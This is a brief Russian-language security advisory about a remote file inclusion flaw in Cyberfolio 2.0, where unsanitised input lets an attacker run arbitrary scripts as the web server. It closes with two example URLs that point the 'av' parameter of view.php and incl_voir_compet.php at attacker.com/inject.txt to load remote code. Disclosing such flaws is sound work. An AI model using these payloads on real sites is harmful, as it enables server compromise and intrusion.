Программа: Cyberfolio 2.0
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных различными сценариями. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.
Примеры:
http://target.com/cyberfolio/portfolio/ msg/view.php?av=http://attacker.com/inject.txt?
http://target.com/cyberfolio/portfolio/ admin/incl_voir_compet.php?av= http://attacker.com/inject.txt?
